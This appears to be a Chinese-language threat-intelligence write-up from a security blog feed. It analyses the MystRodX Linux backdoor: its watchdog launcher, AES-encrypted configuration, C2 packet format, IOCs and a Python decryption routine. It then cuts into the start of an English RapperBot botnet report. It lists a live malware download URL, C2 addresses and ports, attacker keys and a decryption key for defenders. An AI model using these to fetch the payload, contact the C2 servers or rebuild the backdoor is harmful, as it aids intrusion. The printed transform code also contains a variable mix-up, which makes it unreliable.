<p>&#x89E3;&#x5BC6;&#x540E;&#x7684;Payload&#x4E2D;&#x5305;&#x542B;3&#x4E2A;&#x5173;&#x952E;&#x6587;&#x4EF6;chargen&#xFF0C;busybox&#xFF0C;daytime&#x3002;&#x5176;&#x4E2D;daytime&#x4E3A;Launcher&#x7EC4;&#x4EF6;&#xFF0C;&#x8D1F;&#x8D23;&#x542F;&#x52A8;chargen&#xFF1B;chargen&#x4E3A;&#x6838;&#x5FC3;&#x7EC4;&#x4EF6;MystRodX&#x540E;&#x95E8;&#x3002;Payload &#x7684;&#x6821;&#x9A8C;&#x673A;&#x5236;&#x4F9D;&#x8D56; <strong><code>C2 0A D7 A4 22 21 5A</code></strong> &#x8FD9;&#x4E00; 7 &#x5B57;&#x8282;&#x7684;&#x6821;&#x9A8C;&#x503C;&#x3002;Dropper&#x4F1A;&#x6BD4;&#x5BF9;&#x8BE5;&#x503C;&#xFF0C;&#x4EC5;&#x5728;&#x5339;&#x914D;&#x65F6;&#x624D;&#x4F1A;&#x91CA;&#x653E; <strong>Launcher</strong> &#x548C; <strong>MystRodX</strong> &#x540E;&#x95E8;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_decryptpayload.png" alt="dst_decryptpayload.png" loading="lazy"></p>
<h1 id="launcher%E5%88%86%E6%9E%90">Launcher&#x5206;&#x6790;</h1>
<p>Launcher&#x4F7F;&#x7528;&#x76F8;&#x540C;&#x7684;&#x5B57;&#x4E32;&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;clog&#xFF0C;dlog&#x7528;&#x4E8E;&#x4FDD;&#x5B58;MystRodX&#xFF0C;Launcher&#x7684;pid&#x3002;&#x5B83;&#x7684;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x662F;&#x6301;&#x7EED;&#x76D1;&#x63A7;MystRodX&#x540E;&#x95E8;&#x8FDB;&#x7A0B;chargen&#x7684;&#x8FD0;&#x884C;&#x72B6;&#x6001;&#xFF0C;&#x82E5;&#x53D1;&#x73B0;chargen&#x672A;&#x8FD0;&#x884C;&#xFF0C;&#x91CD;&#x65B0;&#x542F;&#x52A8;&#x8BE5;&#x540E;&#x95E8;&#x8FDB;&#x7A0B;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_launcher-1.png" alt="dst_launcher.png" loading="lazy"></p>
<h1 id="mystrodx%E5%90%8E%E9%97%A8%E5%88%86%E6%9E%90">MystRodX&#x540E;&#x95E8;&#x5206;&#x6790;</h1>
<p>MystRodX&#x662F;&#x4E00;&#x4E2A;C++&#x5B9E;&#x73B0;&#x7684;&#x5178;&#x578B;&#x540E;&#x95E8;&#xFF0C;&#x6837;&#x672C;&#x4E2D;&#x7684;&#x7C7B;&#x540D;&#x6E05;&#x6670;&#x7684;&#x63ED;&#x793A;&#x4E86;&#x5B83;&#x652F;&#x6301;&#x7684;&#x529F;&#x80FD;&#xFF0C;&#x6BD4;&#x5982;&#x6587;&#x4EF6;&#x7BA1;&#x7406;&#xFF0C;&#x53CD;&#x5F39;shell&#xFF0C;socks&#x4EE3;&#x7406;&#xFF0C;&#x7AEF;&#x53E3;&#x8F6C;&#x53D1;&#x7B49;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_class.png" alt="dst_class.png" loading="lazy"></p>
<p>&#x7531;&#x4E8E;&#x7BC7;&#x5E45;&#x9650;&#x5236;&#xFF0C;&#x672C;&#x6587;&#x4E0D;&#x518D;&#x5BF9;&#x5E38;&#x89C1;&#x529F;&#x80FD;&#x5C55;&#x5F00;&#x5206;&#x6790;&#xFF0C;&#x800C;&#x662F;&#x4ECE;&#x4E3B;&#x673A;&#x884C;&#x4E3A;&#xFF0C;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#x4FE9;&#x4E2A;&#x65B9;&#x9762;&#xFF0C;&#x5BF9;MystRodX &#x7684;&#x7279;&#x8272;&#x529F;&#x80FD;&#x8FDB;&#x884C;&#x5256;&#x6790;&#xFF0C;&#x5305;&#x62EC;&#xFF1A;</p>
<ul>
<li>&#x53CC;&#x8FDB;&#x7A0B;&#x5B88;&#x62A4;&#x673A;&#x5236;</li>
<li>&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x7684;&#x89E3;&#x5BC6;</li>
<li>&#x901A;&#x4FE1;&#x534F;&#x8BAE;</li>
<li>&#x88AB;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;</li>
</ul>
<h2 id="0x1-%E5%8F%8C%E8%BF%9B%E7%A8%8B%E5%AE%88%E6%8A%A4">0x1: &#x53CC;&#x8FDB;&#x7A0B;&#x5B88;&#x62A4;</h2>
<p>MystRodX&#x4F1A;&#x6301;&#x7EED;&#x76D1;&#x63A7;daytime&#x8FDB;&#x7A0B;&#x7684;&#x8FD0;&#x884C;&#x72B6;&#x6001;&#x3002;&#x5982;&#x679C;&#x53D1;&#x73B0;daytime&#x672A;&#x8FD0;&#x884C;&#xFF0C;MystRodX&#x4F1A;&#x7ACB;&#x5373;&#x542F;&#x52A8;&#x91CD;Launcher&#x8FDB;&#x7A0B;&#x3002;&#x8FD9;&#x6837;&#xFF0C;Launcher&#x548C;MystRodX&#x5C31;&#x5F62;&#x6210;&#x4E86;&#x53CC;&#x8FDB;&#x7A0B;&#x5B88;&#x62A4;&#x673A;&#x5236;&#xFF0C;&#x4FE9;&#x8005;&#x4E2D;&#x4EFB;&#x610F;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;&#x7EC8;&#x6B62;&#xFF0C;&#x90FD;&#x4F1A;&#x88AB;&#x5BF9;&#x65B9;&#x91CD;&#x65B0;&#x62C9;&#x8D77;&#xFF0C;&#x786E;&#x4FDD;&#x957F;&#x671F;&#x7A33;&#x5B9A;&#x8FD0;&#x884C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_proclaunch.png" alt="dst_proclaunch.png" loading="lazy"></p>
<h2 id="0x2-%E9%85%8D%E7%BD%AE%E8%A7%A3%E5%AF%86">0x2: &#x914D;&#x7F6E;&#x89E3;&#x5BC6;</h2>
<p>MystRodX&#x7684;&#x914D;&#x7F6E;&#x4F7F;&#x7528;AES&#x52A0;&#x5BC6;&#xFF0C;AES&#x5BC6;&#x94A5;&#x548C;Payload&#x4E00;&#x6837;&#x4F7F;&#x7528;Transform&#x7B97;&#x6CD5;&#x4FDD;&#x62A4;&#xFF0C;&#x53EA;&#x4E0D;&#x8FC7;key1&#xFF0C;xorkey&#xFF0C;key2&#x7684;&#x503C;&#x6709;&#x6240;&#x4E0D;&#x540C;&#x3002;</p>
<pre><code>key1:0xd

xorkey
00000000  00 02 07 11 13 19 04 06 16 0e 18 0b 02 2d 0b 19  |.............-..|
00000010  a0 91 02 23 96 45 6c 1c b1 d2 7f e3 22 00 00 00  |&#xA0;..#.El.&#xB1;&#xD2;.&#xE3;&quot;...|

key2:0xf1
</code></pre>
<p>&#x4EE5;&#x4E0B;&#x662F;AES&#x76F8;&#x5173;&#x7684;&#x5BC6;&#x6587;&#x4E0E;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x660E;&#x6587;&#xFF0C;AES&#x5BC6;&#x94A5;&#x4ECE;&#x660E;&#x6587;&#x7684;0x08&#x504F;&#x79FB;&#x5904;&#x5F00;&#x59CB;&#xFF0C;&#x957F;&#x5EA6;&#x4E3A;32&#x5B57;&#x8282;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_aeskey.png" alt="dst_aeskey.png" loading="lazy"><br>
&#x4F7F;&#x7528;&#x4E0A;&#x8FF0; AES &#x5BC6;&#x94A5;&#xFF0C;&#x914D;&#x5408;&#x786C;&#x7F16;&#x7801;&#x7684; IV <code>0D 0F 02 04 08 07 2D 1C 01 04 0D 01 02 07 06 02</code>&#xFF0C;&#x91C7;&#x7528;CBC&#x6A21;&#x5F0F;&#x5373;&#x53EF;&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x4EE5;&#x53C2;&#x9605;Appendix&#x7684;CyberChef&#x3002;</p>
<p>&#x4EE5;&#x4E0B;&#x4E3A;&#x6837;&#x672C;72d377fa8ccf23998dd7c22c9647fc2a&#x7684;&#x914D;&#x7F6E;&#xFF1A;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_config.png" alt="dst_config.png" loading="lazy"></p>
<p>&#x4EE5;&#x4E0B;&#x4E3A;&#x6837;&#x672C;a46f2c771fb580e2135ab898731be9a7&#x7684;&#x914D;&#x7F6E;&#xFF1A;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_config_cfr.png" alt="dst_config_cfr.png" loading="lazy"></p>
<p>&#x914D;&#x7F6E;&#x4E2D;&#x5305;&#x542B;&#x6D3B;&#x52A8;&#x540D;&#x3001;&#x65F6;&#x95F4;&#x3001;C2&#xFF0C;&#x7AEF;&#x53E3;&#xFF0C;&#x516C;&#x94A5;&#x7B49;&#x4FE1;&#x606F;&#x3002;&#x4E0B;&#x8868;&#x5217;&#x51FA;&#x4E86;&#x5404;&#x5C5E;&#x6027;&#x53CA;&#x5176;&#x5728;&#x914D;&#x7F6E;&#x4E2D;&#x7684;&#x504F;&#x79FB;&#x91CF;&#xFF08;&#x6CE8;&#xFF1A;&#x914D;&#x7F6E;&#x56E0;&#x6837;&#x672C;&#x800C;&#x5F02;&#xFF09;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Field</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>Campaign</td>
</tr>
<tr>
<td>0x08</td>
<td>Backdoor Type</td>
</tr>
<tr>
<td>0x0c</td>
<td>MainC2 Port</td>
</tr>
<tr>
<td>0x10</td>
<td>BackupC2 Port</td>
</tr>
<tr>
<td>0x1c</td>
<td>Interval</td>
</tr>
<tr>
<td>0x24</td>
<td>Effective date</td>
</tr>
<tr>
<td>0x78</td>
<td>Main C2</td>
</tr>
<tr>
<td>0x178</td>
<td>Backup C2</td>
</tr>
<tr>
<td>0x278</td>
<td>Public Key</td>
</tr>
</tbody>
</table>
<p>&#x5F53;Backdoor Type&#x7B49;&#x4E8E;1&#x65F6;&#xFF0C;MystRodx&#x8FDB;&#x5165;&#x88AB;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;&#xFF0C;&#x7B49;&#x5F85;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#xFF1B;&#x5F53;Backdoor Type&#x7684;&#x503C;&#x4E0D;&#x4E3A;1&#x65F6;&#xFF0C;MystRodX&#x8FDB;&#x5165;&#x4E3B;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;&#x4E0E;&#x914D;&#x7F6E;&#x4E2D;&#x7684;C2&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x6267;&#x884C;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;&#x76EE;&#x524D;&#x6355;&#x83B7;&#x7684;&#x4FE9;&#x4E2A;&#x6837;&#x672C;&#x4E2D;&#x7684;Backdoor Type&#x7684;&#x503C;&#x5747;&#x4E3A;0&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_choice.png" alt="dst_choice.png" loading="lazy"></p>
<h2 id="0x3-%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1">0x3: &#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h2>
<p>MystRodX &#x540E;&#x95E8;&#x652F;&#x6301; TCP &#x548C; HTTP &#x4E24;&#x79CD;&#x901A;&#x4FE1;&#x6A21;&#x5F0F;&#xFF0C;&#x5E76;&#x53EF;&#x914D;&#x7F6E;&#x662F;&#x5426;&#x542F;&#x7528; AES &#x52A0;&#x5BC6;&#x3002;&#x5F53;&#x524D;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x5747;&#x91C7;&#x7528; TCP &#x6A21;&#x5F0F;&#xFF0C;&#x4E14;&#x672A;&#x542F;&#x7528;&#x52A0;&#x5BC6;&#x529F;&#x80FD;&#x3002;&#x7F51;&#x7EDC;&#x62A5;&#x6587;&#x683C;&#x5F0F;&#x4E3A;<code>Packet Length (4bytes) + Main Code(4 bytes) + Sub Code(4 bytes) + Packet Direction(4 bytes) + Data</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_packet.png" alt="dst_packet.png" loading="lazy"></p>
<p>&#x4EE5;&#x62A5;&#x6587;<code>10 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00</code>&#x4E3A;&#x4F8B;&#xFF0C;&#x5B83;&#x8868;&#x793A;&#x8BE5;&#x62A5;&#x6587;&#x7531;&#x4E8E;BOT&#x53D1;&#x5F80;C2&#xFF0C;&#x957F;&#x5EA6;&#x4E3A;16&#x5B57;&#x8282;&#xFF0C;MainCode&#xFF0C;SubCode&#x5206;&#x522B;&#x4E3A;1&#xFF0C;&#x5176;&#x5B9E;&#x5B83;&#x6B63;&#x662F;MystRodX &#x7684;&#x4E0A;&#x7EBF;&#x62A5;&#x6587;&#x3002;</p>
<pre><code>Little Endian
10 00 00 00  ---&gt;  Pakcet length, 0x10 bytes
01 00 00 00  ---&gt;  Main Code, 0x01
01 00 00 00  ---&gt;  Sub Code, 0x01 
01 00 00 00  ---&gt;  Direction, 0x01, bot_to_c2
</code></pre>
<p>&#x534F;&#x8BAE;&#x4E2D;&#x7684;MainCode&#x7684;&#x503C;&#x53EF;&#x4EE5;&#x662F;&#xFF1A;1&#xFF0C;2&#xFF0C;5&#xFF0C;7&#xFF0C;8&#x3002;&#x5176;&#x4E2D;2&#x3001;5&#x3001;7&#x3001;8&#x5206;&#x522B;&#x5BF9;&#x5E94;&#x53CD;&#x5F39;shell&#x3001;&#x6587;&#x4EF6;&#x7BA1;&#x7406;&#x3001;&#x7AEF;&#x53E3;&#x8F6C;&#x53D1;&#x548C;socks&#x7BA1;&#x7406;&#x529F;&#x80FD;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_maincode.png" alt="dst_maincode.png" loading="lazy"></p>
<p>&#x800C;1&#x5219;&#x8868;&#x793A;&#x901A;&#x7528;&#x7BA1;&#x7406;&#x529F;&#x80FD;&#xFF0C;&#x4E3B;&#x8981;&#x7528;&#x4E8E;C2&#x5BF9;Bot&#x7684;&#x63A7;&#x5236;&#x64CD;&#x4F5C;&#xFF0C;&#x4F8B;&#x5982;&#x66F4;&#x65B0;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x3001;&#x4E0A;&#x4F20;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x7B49;&#x3002;&#x8FD9;&#x4E9B;&#x64CD;&#x4F5C;&#x88AB;&#x5206;&#x914D;&#x4E86;&#x4E0D;&#x540C;&#x7684;SubCode&#xFF0C;&#x4E0B;&#x8868;&#x4E3A;SubCode&#x4EE5;&#x53CA;&#x5B83;&#x4EEC;&#x5BF9;&#x5E94;&#x7684;&#x529F;&#x80FD;&#x3002;</p>
<table>
<thead>
<tr>
<th>SubCode</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Beacon</td>
</tr>
<tr>
<td>2</td>
<td>Uplaod DeviceInfo</td>
</tr>
<tr>
<td>4</td>
<td>Heartbeat</td>
</tr>
<tr>
<td>7</td>
<td>Enable Traffic encryption</td>
</tr>
<tr>
<td>14</td>
<td>Set a new interval</td>
</tr>
<tr>
<td>15</td>
<td>Update Configuration</td>
</tr>
<tr>
<td>16</td>
<td>Teardown</td>
</tr>
<tr>
<td>19</td>
<td>Upload TimeInfo</td>
</tr>
</tbody>
</table>
<p>&#x4EE5;&#x5B9E;&#x9645;&#x6355;&#x83B7;&#x7684;&#x6D41;&#x91CF;&#x4E3A;&#x4F8B;&#xFF0C;&#x5F53;bot&#x6536;&#x5230;MainCode&#x4E3A;1&#xFF0C;SubCode&#x4E3A;2&#x7684;&#x6307;&#x4EE4;&#x540E;&#xFF0C;&#x5C31;&#x4F1A;&#x5C06;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x4E0A;&#x62A5;&#x7ED9;C2&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_deviceinfo.png" alt="dst_deviceinfo.png" loading="lazy"></p>
<p>&#x53E6;&#x5916;&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;&#xFF0C;&#x5F53;&#x542F;&#x7528;&#x6D41;&#x91CF;&#x52A0;&#x5BC6;&#x540E;&#xFF0C;&#x7F51;&#x7EDC;&#x62A5;&#x6587;&#x683C;&#x5F0F;&#x6709;&#x6240;&#x53D8;&#x5316;&#xFF0C;&#x5347;&#x7EA7;&#x4E3A;<code>CipherText Length(4bytes)+ PlainText Length(4bytes) + padding(8bytes) + CipherText</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_ciphertxt.png" alt="dst_ciphertxt.png" loading="lazy"></p>
<h1 id="%E6%80%BB%E7%BB%93">&#x603B;&#x7ED3;</h1>
<p>&#x81F3;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9; MystRodX &#x7684;&#x5206;&#x6790;&#x6682;&#x544A;&#x4E00;&#x6BB5;&#x843D;&#x3002;&#x4EE5;&#x4E0A;&#x662F;&#x76EE;&#x524D;&#x6240;&#x638C;&#x63E1;&#x7684;&#x5168;&#x90E8;&#x76F8;&#x5173;&#x60C5;&#x62A5;&#xFF0C;&#x7F51;&#x7EDC;&#x7BA1;&#x7406;&#x5458;&#x53EF;&#x53C2;&#x8003;&#x6280;&#x672F;&#x5206;&#x6790;&#x4E2D;&#x7684;&#x5404;&#x9879;&#x7EC6;&#x8282;&#xFF0C;&#x4EE5;&#x5224;&#x65AD;&#x81EA;&#x8EAB;&#x7CFB;&#x7EDF;&#x662F;&#x5426;&#x5DF2;&#x906D;&#x53D7;&#x8BE5;&#x540E;&#x95E8;&#x5165;&#x4FB5;&#x3002;</p>
<p>&#x7531;&#x4E8E;&#x89C6;&#x91CE;&#x6240;&#x9650;&#xFF0C;&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x5C1A;&#x4E0D;&#x6E05;&#x695A; MystRodX &#x7684;&#x5177;&#x4F53;&#x5165;&#x4FB5;&#x9014;&#x5F84;&#x3001;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x4E0E;&#x771F;&#x5B9E;&#x610F;&#x56FE;&#x3002;&#x6211;&#x4EEC;&#x8BDA;&#x631A;&#x6B22;&#x8FCE;&#x638C;&#x63E1;&#x66F4;&#x591A;&#x4FE1;&#x606F;&#x7684;&#x4E1A;&#x5185;&#x4F19;&#x4F34;&#x5411;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x60C5;&#x62A5;&#xFF0C;&#x5171;&#x540C;&#x52A9;&#x529B;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x9632;&#x5FA1;&#x3002;</p>
<p>&#x5982;&#x679C;&#x60A8;&#x5BF9;&#x6211;&#x4EEC;&#x7684;&#x7814;&#x7A76;&#x611F;&#x5174;&#x8DA3;&#xFF0C;&#x6216;&#x4E86;&#x89E3;&#x4E0E;&#x8BE5;&#x540E;&#x95E8;&#x76F8;&#x5173;&#x7684;&#x7EBF;&#x7D22;&#xFF0C;&#x6B22;&#x8FCE;&#x901A;&#x8FC7;<a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X&#x5E73;&#x53F0;</a>&#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#x3002;</p>
<h1 id="ioc">IOC</h1>
<h2 id="downloader">Downloader</h2>
<pre><code>http://139.84.156[.]79/dst-x86.bin

</code></pre>
<h2 id="c2-campaign">C2 &amp; Campaign</h2>
<pre><code>airtel.vpndns.net:443   neybquno
149.28.130.195:443    zoufkcfr

149.28.137.254:8010   neybquno
149.28.137.254:8443   zoufkcfr


156.244.6.68:443    unknown
185.22.153.228:443  unknown
</code></pre>
<h2 id="sample-md5">Sample MD5</h2>
<pre><code>Dropper
5e3a2a0461c7888d0361dd75617051c6 *dst
72d377fa8ccf23998dd7c22c9647fc2a *chargen
5bf67ce1b245934965557de6d37f286f *daytime


fa3b4d5fd1f6c995395244f36c18ffec *dst
a46f2c771fb580e2135ab898731be9a7 *chargen
e8fcb7f3f0edfc7d1a99918dc14527d1 *daytime
1f003437e3d10e07f5ee5f51c61c548f *networkd

Patched By Xlab
4dc20d1177da7932be3d63efe939b320
2775d9eac1c4a5eb2c45453d63ea6379
4db35e708c2d0cabe4709fa0540bafb7
</code></pre>
<h2 id="public-key">Public Key</h2>
<h3 id="neybquno">neybquno</h3>
<pre><code>-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7/nw8KnB3Ow2uUR1bNW
60UQKOI7emuau8AyCK4KqK/iUGQJzOoopLgi2D4DWrK5Wi+qtgLPt7WSTFUnMGge
XRbXdHamEasF/8kNhuv7F/CKSc+sCy/TrtLeYAQH4nuT+PhMym0aOLEwSJIuDu+4
wgUzONdgpkZZnx2h8TQmzv3LmeQWx1iOk+L4SrwbG3Cs889eWlj2O66hyT5kz6s5
6HxRjZD4V1zuWzcuoNpdqaKKA4DaraF4onYNNctIiSdkaTKPeJaim+whljmuFn8Q
y9WKcT2yogoUaUd3fkx+MPaK80R6nIEN+ooreBkf2eXXJwuTRFl1eocaUENENo5h
QwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<h3 id="zoufkcfr">zoufkcfr</h3>
<pre><code>-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5blT2R1XzP3T0Eu0vatg
u8h15ysd+TYQWYCrm1LT9bISVx9Jhzhbf3l5oFQD/TBstZQ6hjhUZuDCczdaYZJu
4HVzhkmVKsyjLV16aG5mCbDiF/bR879jSDJMZoqZJOitAA0xQQ2FqmuOxlFkN8Ab
Rd87xcDTF/SzWcV2nj6UlNHcFilxz48kai3/lcypnIoUtnEMtkMGsRX81LVniyUm
yrvvRAA7PQqHa1qFbJSt3xY+FAzC/Iy6QbSnrMoc8FVMCDUR/YKLCDU2c3SUshUs
Xkanh6odvXOBjEKoEbaBgc3Bb2uAPdiDkEGqDiZl0yitzopA9+f+606Q5UG9CVcW
OwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<h1 id="appendix">Appendix</h1>
<h2 id="transform-algorithm">Transform Algorithm</h2>
<pre><code>key_for_dropper=bytes.fromhex(&apos;02 06 03 09 04 02 0e 0a 01 0f 08 0a 04 0d 0b 09
0a 09 01 03 06 05 6d 0c 01 02 0f 03 03 0a 05 00&apos;)


key_for_backdoor=bytes.fromhex(&apos;00 02 07 11 13 19 04 06 16 0E 18 0B 02 2D 0B 19
A0 91 02 23 96 45 6C 1C B1 D2 7F E3 22 00 00 00&apos;)


def calc_sum(buf):
    checksum = 0
    for i, v in enumerate(key):
        checksum ^= (v &lt;&lt; (i&amp;7)) &amp; 0xFF  
    return checksum  
    

def transform(magic,magic2,buf,key):
    
    buf_len=len(buf)-1
    key_len=len(key)
    key1=magic ^ calc_sum(key)
    
    key2=(key[(key1^buf_len)%key_len]) ^ magic2 ^ buf_len
    out=bytearray()
    for i, value in enumerate(buf):
        out.append((key[(i^key1)%key_len] ^ key2 ^ value ^ i)&amp;0xff)

    return out
</code></pre>
<h2 id="cyberchef">CyberChef</h2>
<pre><code>https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B&apos;option&apos;:&apos;UTF8&apos;,&apos;string&apos;:&apos;z7bcjTSKrFiHYUB63NZendVvtJ2RGfo8&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;0d%200f%2002%2004%2008%2007%202d%201c%2001%2004%200d%2001%2002%2007%2006%2002&apos;%7D,&apos;CBC&apos;,&apos;Raw&apos;,&apos;Raw&apos;,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D)To_Hexdump(16,false,false,false)&amp;input=PBpcVtR8VHCFl/oaqAGk0w7pCVMMe1xQ1Ma0FBs2X2P9vpD6GrVC/b6XqKDWb/eFS/g9najMHOO3r38h3V9lZvvSKl31GM2FJbIKw91n/r6Z9TgKmrlLdLroahpV91HmQPi2ttGAyXrF9SmsLMCBqA6X5fIPZ/v3cEI69nKREj1Fq%2BHffi6q4s3sfzgDmFDZL9XFff9g2AtSVm7MLBAhNjMXqifFPxIbo5L0McZ%2B%2B78Wrdv3VnsvZIZTBLLM%2BEY/EqiKf73OIvmRGrI3Q4ksiGyG8CTcau6hrlJUN91IWdSjRU0vNPxvwIU4qy9aTSKhTI2Be2Cc53B3aRu%2BGKMcFG0d/IioT0fb1MxeIMPKtPViBzHRRj0OGbK5OFpX0nfdTyAEW85fnXos14I6yO7%2B/JfsaF4YQv7OVCKgQnYXFrjMMajtE%2BoiGInB6d4ybrNNXA3u3p%2BQ3leErM8yuIpvzSre6wPsyJ4VZxyPQA4iRn1AnZO7QA5UG2IzqPCXZfAvLHhvMqMNI9D8bwInx1pnVdx2kwHQhxvyzLGFxkVrhvTcZSGSG708jkAYfzjItoPANBc0WMg0NWuSs53gVmuc/UJk%2BvEiZTjHayg4o1yLANpPtRTfmIMcLfSRIw2BCdthqmPLwx8L46rvUycpHvL3Nb7vl9Uwr12%2BqRjMQj5aaLg4veTaOnRCSJTjVq9aRrzjZutk1hb9CiS/JigJYJoxhCnZ82ZpTIzrjMR8RjES5UX9%2B9/3xkARRcAunSTQP8SZiPVuMOXTHyKB8nr7NsfoUeQ1ixisswp7E3FOqmel92N2CdmrifZzdD3KmnPubHhM5OIX7x0X9004py1zlMSZCAPPLvrCxLpBwqkmuxNjlW7Qz6FKMgXoiwucVrYUzj3rWPBpENrqBAkWvKR3c9Y6dKzTmOPT/CRsEvdbe/l5MWmg5n7vog0TOR3TQpaDRBVC6HMsCSIS/NG0lteKVEevZQDQvSqtWbjMneAUvQ8RLEl8e7CDAQN7xfmQpdRVbaqUtD7hzvz9pfsHgWCG5g0lMkYA6NQFtfyH98/DwB/Jo5fmUANQZGu8XJ6pDF7KSqbqKDxk2EzVNK7po3llMavonwq9JxHk8xoywqGhNoKLWbFlatzFx6fTqn%2BtLZBZcYzb/csSzWeq9t3ireaZw3EJGaxOX09YvlTZbCMIyIEed17qkdNbufSJ4hPWsLHzmnihehvy1xOPlmVX%2BjLnBHRX5mNgVdWednIL0duHduvvCOejxcn5QFTwaspWfeSXYXlNoMFrVfCvrv%2BscinLs2OvtUlBV3mijU2pnE0tmTn%2BZqpYCeht5cWA5VAPbz63mOEIAl9%2BNcYsrUAaZf51jiyzhBI%2BW0pH5kATshWsI0Ltl6rThYzCOYdgzaSRDEjOw/dNqJdK2k8Ut4t5uUvcgw4oryOrhQOJVaVcGX%2BvRVnwYzfeF5ryWFbfvlVp661XNlA7
</code></pre>
]]></content:encoded></item><item><title><![CDATA[Botnets Never Die: Analysis of the RapperBot Botnet]]></title><description><![CDATA[<h1 id="overview">Overview</h1>
<p>RapperBot is an active botnet family first publicly <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html?ref=blog.xlab.qianxin.com">disclosed</a> and named by CNCERT in July 2022. FortiGuard Labs traced its activity back to 2021 in their November 2022 <a href="https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks?ref=blog.xlab.qianxin.com">report</a>. In February 2025, RapperBot participated in an attack against Deepseek; its attack behavior has been significantly active since March, with</p>]]></description><link>https://blog.xlab.qianxin.com/rapperbot-en/</link><guid isPermaLink="false">6851413d6bb47b0001192f17</guid><category><![CDATA[EN]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><dc:creator><![CDATA[Wang Hao]]></dc:creator><pubDate>Thu, 19 Jun 2025 10:43:05 GMT</pubDate><content:encoded><![CDATA[<h1 id="overview">Overview</h1>
<p>RapperBot is an active botnet family first publicly <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html?ref=blog.xlab.qianxin.com">disclosed</a> and named by CNCERT in July 2022. FortiGuard Labs traced its activity back to 2021 in their November 2022 <a href="https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks?ref=blog.xlab.qianxin.com">report</a>. In February 2025, RapperBot participated in an attack against Deepseek; its attack behavior has been significantly active since March, with an average of over a hundred targets per day and more than 50,000 bots observed.</p>
<p>This family not only continues to iterate but also leaves provocative messages in its samples. For example, some samples contained an unused string: <a href="https://www.youtube.com/watch?v=4fm_ZZn5qaw&amp;ref=blog.xlab.qianxin.com">https://www.youtube.com/watch?v=4fm_ZZn5qaw</a>, which links to a rap song titled &quot;I Am Da Bag.&quot; Other samples included strings urging people to follow the rapper 2tallforfood. The authors even asked reverse engineers whether they listened to their music while analyzing the samples and openly taunted our former team, <code>NETLAB360</code>.</p>
<p>It even promised to &quot;leave a new message&quot; in the next update. Unfortunately, we have not received any further communication. The message left in the sample is as follows:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/05/pastebin_netlab.png" alt="pastebin_netlab.png" loading="lazy"></p>
